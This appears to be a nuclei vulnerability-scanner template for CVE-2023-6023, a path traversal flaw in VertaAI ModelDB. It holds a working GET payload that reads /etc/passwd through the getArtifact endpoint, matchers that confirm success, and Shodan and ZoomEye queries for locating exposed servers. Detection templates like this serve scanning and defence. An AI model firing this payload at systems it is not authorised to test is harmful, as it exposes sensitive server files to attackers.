nuclei-templates/http/cves/2023/CVE-2023-6023.yaml

54 lines
1.8 KiB
YAML

id: CVE-2023-6023
info:
name: VertaAI ModelDB - Path Traversal
author: m0ck3d,cookiehanhoan
severity: high
description: |
The endpoint "/api/v1/artifact/getArtifact?artifact_path=" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.
impact: |
Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server. As an impact it is known to affect confidentiality.
remediation: Restrict access to the web application
reference:
- https://huntr.com/bounties/644ab868-db6d-4685-ab35-1a897632d2ca/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6023
cwe-id: CWE-22,CWE-29
epss-score: 0.00248
epss-percentile: 0.62792
cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: vertaai
product: modeldb
shodan-query: http.favicon.hash:-2097033750
zoomeye-query: title:"Verta AI"
tags: cve,cve2023,lfi,modeldb
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- "filename="
condition: and
- type: status
status:
- 200
# digest: 490a0046304402207e6245387c45f59c7ef940262cc34d98cda99ca80a5fc524ec6be7328ed6bb95022021bd224674a2875e95881394c8a3672ea61100fa573e70d5076c60d655bd0310:922c64590222798bb761d5b6d8e72950